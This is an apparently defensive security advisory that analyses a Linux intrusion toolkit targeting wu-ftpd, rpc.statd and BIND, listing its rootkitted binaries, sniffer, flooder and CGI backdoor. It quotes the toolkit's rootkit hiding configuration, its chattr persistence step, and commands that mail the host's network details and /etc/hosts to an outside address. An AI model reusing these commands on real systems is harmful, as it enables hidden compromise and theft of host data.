FYI Another hacker tool has been detected in the wild. It is a combination of well known scanners and exploits. Vulnerable wu-ftpd, rpc.statd and bind services are the targets of this tool. Right now it's unclear if it's a fully functional "worm". It has code which allows it to spread via vulnerable statd service but it has a little bug (according to the source code we have) which might have been fixed in the next versions. Several versions of this tool have a variable set of programs. Here is what we know so far: This tool replaces the following files with rootkited version: /sbin/ifconfig - Hide sniffing /bin/netstat - Hide connections /bin/ps - Hide processes /usr/bin/top - Hide processes Rootkited utilities hide the information based on configuration from the files: /dev/dsx and /dev/caca type 0: hide uid type 1: hide local address type 2: hide remote address type 3: hide local port type 4: hide remote port type 5: hide UNIX socket path touch /dev/dsx echo "3 sl2" >>/dev/dsx echo "3 sshdu" >>/dev/dsx echo "3 linsniffer" >>/dev/dsx echo "3 smurf" >>/dev/dsx echo "3 slice" >>/dev/dsx echo "3 mech" >>/dev/dsx echo "3 muh" >>/dev/dsx echo "3 bnc" >>/dev/dsx echo "3 psybnc" >> /dev/dsx touch /dev/caca echo "1 193.231.139" >>/dev/caca echo "1 213.154.137" >>/dev/caca echo "1 193.254.34" >>/dev/caca echo "3 48744" >>/dev/caca echo "3 3666" >>/dev/caca echo "3 31221" >>/dev/caca echo "3 22546" >>/dev/caca echo "4 48744" >>/dev/caca echo "4 2222" >>/dev/caca It installs the following files into /dev/ida/.inet/ linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed * Another version of the this tool installs the following files: bind - BIND exploit ( 8.2, 8.2.1, 8.2.2, 8.2.2-REL, 8.2.2-P3, 8.2.2-P5, 8.2.2-P7 and 4.9.6-REL) bindscan broot - shell script, compiles bind portion of exploit and runs bscan bscan - BIND scanner cleaner - log cleaner incerc - shell script which runs bind or x496 depend on BIND version linsniffer s - sshd config scan - statd scanner slice2 - SYN flooder, part of the Blitznet.tgz a DDoS tool to launche a distributed SYN flood attack with spoofed source IP ssh_host_key ssh_random_seed sshdu - ssh server statdx - rpc.statd exploit for Redhat 6.0 (knfsd-1.2.2-4); Redhat 6.1 (knfsd-1.4.7-7); Redhat 6.2 (nfs-utils-0.1.6-2)) tcp.log - sniffer log vad - sorts the output from LinSniffer wroot - shell script, compiles wu-ftp portion of an exploit and runs wscan wscan - wu-ftpd scanner wu - wuftpd exploit x496 - exploit for BIND 4.9.6-REL ** Files installed on another penetrated machine: a - directory contains Adore a linux LKM based rootkit. f linsniffer mech - EnergyMech is a UNIX compatible IRC bot o - directory contains: luckscan-a,luckscan-a.c,luckstatdx, luckstatdx.c, x) pid - pid file s ssh_host_key ssh_random_seed sshdu tcp.log trace vadimI vadimII w - directory contains: wroot, wscan, wscan.c, wu, wu.c w00f - Remote/local exploit for wuftp2.4.2academ beta 12-18 by Mixter The tool uses /usr/bin/hdparm to start sshd and linsniffer It sets "immutable (i)" attribute on the file /usr/bin/hdparm with "chattr +i /usr/bin/hdparm" command. A file with the `i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file. Only the superuser can set or clear this attribute. It tries to install CGI program alya.cgi (which may execute shell commands) in one of the following directories: /home/httpd/cgi-bin/ /usr/local/httpd/cgi-bin/ /usr/local/apache/cgi-bin/ /www/httpd/cgi-bin/ /www/cgi-bin/ As a final step the rootkit emails information about successfully compromised machine: ifconfig | grep inet >> /tmp/info uname -a >> /tmp/info cat /tmp/info | mail -s "port4545 rewting" andrei@andrei.ro cat /etc/hosts | mail -s "port4545 rewting" andrei@andrei.ro References: Permanent address of this article: http://cns.utoronto.ca/~scan/expltool.txt ISC Bind 8 Transaction Signatures Buffer Overflow Vulnerability http://www.securityfocus.com/bid/2302 http://www.redhat.com/support/errata/RHSA-2001-007.html http://www.cert.org/advisories/CA-2001-02.html http://www.isc.org/products/BIND/bind-security.html Multiple Linux Vendor rpc.statd Remote Format String Vulnerability http://www.securityfocus.com/bid/1480 Wu-Ftpd Remote Format String Stack Overwrite Vulnerability http://www.securityfocus.com/bid/1387